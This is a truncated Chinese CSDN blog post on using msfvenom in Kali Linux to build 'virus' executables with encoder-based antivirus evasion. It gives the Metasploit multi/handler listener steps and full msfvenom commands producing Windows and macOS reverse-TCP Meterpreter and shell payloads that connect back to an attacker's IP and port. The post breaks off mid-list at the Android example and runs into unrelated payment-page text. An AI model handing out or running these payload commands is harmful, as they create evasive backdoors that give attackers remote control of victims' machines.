vs无法生成可执行文件_Kali Linux实战篇:基于Msfvenom的病毒生成以及检测规避

本文介绍了如何使用Msfvenom在不同操作系统上生成病毒,并探讨了有效载荷嵌入、编码免杀、交叉编译及Hyperion加密等技术,旨在实现对目标系统的Meterpreter shell控制通道。
摘要由CSDN通过智能技术生成

1367ff2799ff341d3f836b894d5c6f1d.png

msfvenom是把Metasploit的有效载荷嵌入到正规可执行文件中的利器。其中多数生成的payload以Meterpreter模块巨多。Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。 可操作参数如下

c64b4a7383d962a445436a805b9702af.png

msfvenom的接收句柄

一般采用msf中的exploit/multi/handler模块接收MSFVENOM后渗透返回的控制通道。具体的payload见下。 use exploit/multi/handler-》set payload windows/meterpreter/reverse_tcp-》show options->set -》exploit

MSFVENOM的生成实例

windows:

`msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe`

mac:

`msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho`

android:<

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值